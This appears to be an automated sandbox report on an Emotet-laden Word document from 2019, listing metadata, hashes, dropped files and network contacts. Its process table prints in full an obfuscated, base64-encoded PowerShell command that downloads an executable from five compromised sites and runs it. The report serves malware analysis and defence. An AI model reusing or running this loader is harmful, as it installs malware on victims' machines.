File name: | BL_22565528242292101.doc |
Full analysis: | https://app.any.run/tasks/0f598bb8-0f22-440c-8132-2973b4577b8c |
Verdict: | Malicious activity |
Threats: | Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns. |
Analysis date: | September 18, 2019, 18:34:45 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
MIME: | application/msword |
File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Title: utilize real-time, Subject: quantifying, Author: Salvador Grady, Comments: Home & Books, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Wed Sep 18 15:32:00 2019, Last Saved Time/Date: Wed Sep 18 15:32:00 2019, Number of Pages: 1, Number of Words: 95, Number of Characters: 547, Security: 0 |
MD5: | 7E11D8B40BDDDAABDB00C81E116E3892 |
SHA1: | BEE89AB272BB6C8B93DD1A1B0D14DC3C6F4DEBAB |
SHA256: | B6E8132C9284FC40ED53BD0FD11363AB05F7A4A54EA53DFBF69D8380B0238AF1 |
SSDEEP: | 6144:Vj1qmTgpbxDj2kCUSfp40kTPLkIq7NSU4jJntATfDfBlPi7V:Vj1qmTgpbxDj2kCUSfp40k/Xq7NSU4VT |
.doc | | | Microsoft Word document (54.2) |
---|---|---|
.doc | | | Microsoft Word document (old ver.) (32.2) |
Title: | utilize real-time |
---|---|
Subject: | quantifying |
Author: | Salvador Grady |
Keywords: | - |
Comments: | Home & Books |
Template: | Normal.dotm |
LastModifiedBy: | - |
RevisionNumber: | 1 |
Software: | Microsoft Office Word |
TotalEditTime: | - |
CreateDate: | 2019:09:18 14:32:00 |
ModifyDate: | 2019:09:18 14:32:00 |
Pages: | 1 |
Words: | 95 |
Characters: | 547 |
Security: | None |
CodePage: | Windows Latin 1 (Western European) |
Company: | Watsica, Price and Prosacco |
Lines: | 4 |
Paragraphs: | 1 |
CharCountWithSpaces: | 641 |
AppVersion: | 16 |
ScaleCrop: | No |
LinksUpToDate: | No |
SharedDoc: | No |
HyperlinksChanged: | No |
TitleOfParts: | - |
HeadingPairs: |
|
Manager: | Parker |
CompObjUserTypeLen: | 32 |
CompObjUserType: | Microsoft Word 97-2003 Document |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
2884 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\Downloads\BL_22565528242292101.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
3568 | powershell -encod JABQAGEAaQAxAFUAaQAxADMAPQAnAHAAQQBUAGMAUwBqAGwAJwA7ACQAdwBpAGEAWQBXAEUAIAA9ACAAJwAxADMAMwAnADsAJABqAEwAXwBLAG4AUwBaADIAPQAnAGQAYgB0AFoARAAzAHUAaQAnADsAJABHADIAdwB2AEEATwBDAD0AJABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQArACcAXAAnACsAJAB3AGkAYQBZAFcARQArACcALgBlAHgAZQAnADsAJAB6ADUARQB3AE8AMgB2AD0AJwBzAHoATwBHAFAASwAnADsAJABRADgAawB6AGoAegAwAD0AJgAoACcAbgBlAHcALQBvAGIAagBlACcAKwAnAGMAJwArACcAdAAnACkAIABuAGUAVAAuAHcAZQBCAGMAbABJAEUAbgBUADsAJABuAGIATABPAE4AZABXAFYAPQAnAGgAdAB0AHAAcwA6AC8ALwB3AHcAdwAuAHAAYQB0AHIAaQBjAGsAZwBsAG8AYgBhAGwAdQBzAGEALgBjAG8AbQAvAHcAcAAtAGEAZABtAGkAbgAvAGYAUwBSAGsAQQBGAGoAcQB2AC8AQABoAHQAdABwAHMAOgAvAC8AcABpAHAAaQB6AGgAYQBuAHoAaABhAG4AZwAuAGMAbwBtAC8AdwBwAC0AYQBkAG0AaQBuAC8AMwBjAGkAbwByAG4AegBfAGkAdQBsAGEAeQBzAGMAegAtADYANwA5ADYANAA2AC8AQABoAHQAdABwAHMAOgAvAC8AdABhAG4AawBoAG8AaQAuAHYAbgAvAHcAcAAtAGkAbgBjAGwAdQBkAGUAcwAvAFgAVABTAHUAZwB6AE4AYQB6AC8AQABoAHQAdABwAHMAOgAvAC8AdwB3AHcALgBzAHUAcABlAHIAYwByAHkAcwB0AGEAbAAuAGEAbQAvAHcAcAAtAGEAZABtAGkAbgAvAFAAZABNAEkAbgBTAGcAcwAvAEAAaAB0AHQAcABzADoALwAvAGgAbwB0AGUAbAAtAGIAcgBpAHMAdABvAGwALgBsAHUALwBkAGwAcgB5AC8ATQBBAG4ASgBJAFAAbgBZAC8AJwAuACIAUwBwAGAAbABpAHQAIgAoACcAQAAnACkAOwAkAFEATgBCAEUAXwByADkAPQAnAE8ANQBaAGEAMQBDAFUAJwA7AGYAbwByAGUAYQBjAGgAKAAkAFMANgBmADgAUgBXAFIAIABpAG4AIAAkAG4AYgBMAE8ATgBkAFcAVgApAHsAdAByAHkAewAkAFEAOABrAHoAagB6ADAALgAiAGQAYABPAFcAYABOAGwATwBBAEQAYABGAGkATABFACIAKAAkAFMANgBmADgAUgBXAFIALAAgACQARwAyAHcAdgBBAE8AQwApADsAJABwAEgATAA3AHcAaAA9ACcAUQBMAFYAVgBkAFAAOAAnADsASQBmACAAKAAoAC4AKAAnAEcAZQAnACsAJwB0AC0AJwArACcASQB0AGUAbQAnACkAIAAkAEcAMgB3AHYAQQBPAEMAKQAuACIATABFAGAATgBHAFQASAAiACAALQBnAGUAIAAyADgAOAAwADcAKQAgAHsAWwBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBQAHIAbwBjAGUAcwBzAF0AOgA6ACIAUwB0AEEAYABSAFQAIgAoACQARwAyAHcAdgBBAE8AQwApADsAJABvAFMAOQBNAEcAOQAzAD0AJwBFADEAQgB1ADYAagBPAFgAJwA7AGIAcgBlAGEAawA7ACQAVABiAGYASgBhAFkAPQAnAEIAegBwAGMAXwBaAHMAJwB9AH0AYwBhAHQAYwBoAHsAfQB9ACQARABtAEEATwBFAE4APQAnAG0AUgBiAGIAMQBQADMAOAAnAA== | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | wmiprvse.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
PID | Process | Filename | Type | |
---|---|---|---|---|
2884 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVR8CB4.tmp.cvr | — | |
MD5:— | SHA256:— | |||
2884 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\56F46450.wmf | wmf | |
MD5:2353260EC885C3A98A6C89D22AFF1248 | SHA256:E5117450EB7E41006FA9842A34889226A089FD0434E1EB70E9A3FAEE5353B13C | |||
2884 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\C75BCE9C.wmf | wmf | |
MD5:B419C90F42F3A4C5D5601F2F63E4E4C0 | SHA256:06874DA9DB510979C840838C515DD39001F605663AB249CB831FB165E93249E7 | |||
2884 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\BL_22565528242292101.doc.LNK | lnk | |
MD5:9728399465562548791339FCC08301CC | SHA256:321066EBCEC458BD92AD011A401D5BBF71402341AA54CF051A02B691354F2D98 | |||
2884 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\Word8.0\MSForms.exd | tlb | |
MD5:776B79C938C1D8440FB4A2DA92C25EDE | SHA256:5B78C621F873B27F06A6071F22794A6DE1087345D6B4967BEBC53F928BF998FA | |||
2884 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\index.dat | text | |
MD5:932AF2F455D854325DD588D6555C12D8 | SHA256:987ECC620E558E07B64756E55CAFA97E072D9F634C524EDB883CA140CD993A2E | |||
2884 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\8A4B4547.wmf | wmf | |
MD5:7E5DE4CFA0895E48D0C62AAD162AA2E7 | SHA256:243364152CE5B1EDEE147F71399D746441258C9629E153DCC63A2722C272D05A | |||
2884 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\4FDDA389.wmf | wmf | |
MD5:A6100454A4096CDA254B4F474EDFF6A8 | SHA256:4644B7D695A061E0C50351467074B3F8CB852498EE12328DD6FBF0C0709B9AED | |||
2884 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\D014DB0A.wmf | wmf | |
MD5:3A29DA903BD58B73E1F0C10CA64CA98C | SHA256:AE1164B8174C32D82293B27ED54BFFB64193EDC7C6E04DAF066A776E70727402 | |||
2884 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\55CAE3F6.wmf | wmf | |
MD5:AD736CD196000389A578EEDCA155DAE0 | SHA256:7C36C967B8A8EA18247EF24337AB88030E6DF5F149B9404D3721D2E178878EA6 |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
3568 | powershell.exe | 148.251.180.153:443 | www.patrickglobalusa.com | Hetzner Online GmbH | DE | malicious |
3568 | powershell.exe | 213.186.33.186:443 | hotel-bristol.lu | OVH SAS | FR | suspicious |
3568 | powershell.exe | 111.67.206.122:443 | pipizhanzhang.com | China Unicom Beijing Province Network | CN | unknown |
3568 | powershell.exe | 103.221.222.16:443 | tankhoi.vn | The Corporation for Financing & Promoting Technology | VN | unknown |
3568 | powershell.exe | 104.248.24.81:443 | www.supercrystal.am | — | US | unknown |
Domain | IP | Reputation |
---|---|---|
www.patrickglobalusa.com |
| malicious |
pipizhanzhang.com |
| unknown |
tankhoi.vn |
| unknown |
www.supercrystal.am |
| unknown |
hotel-bristol.lu |
| suspicious |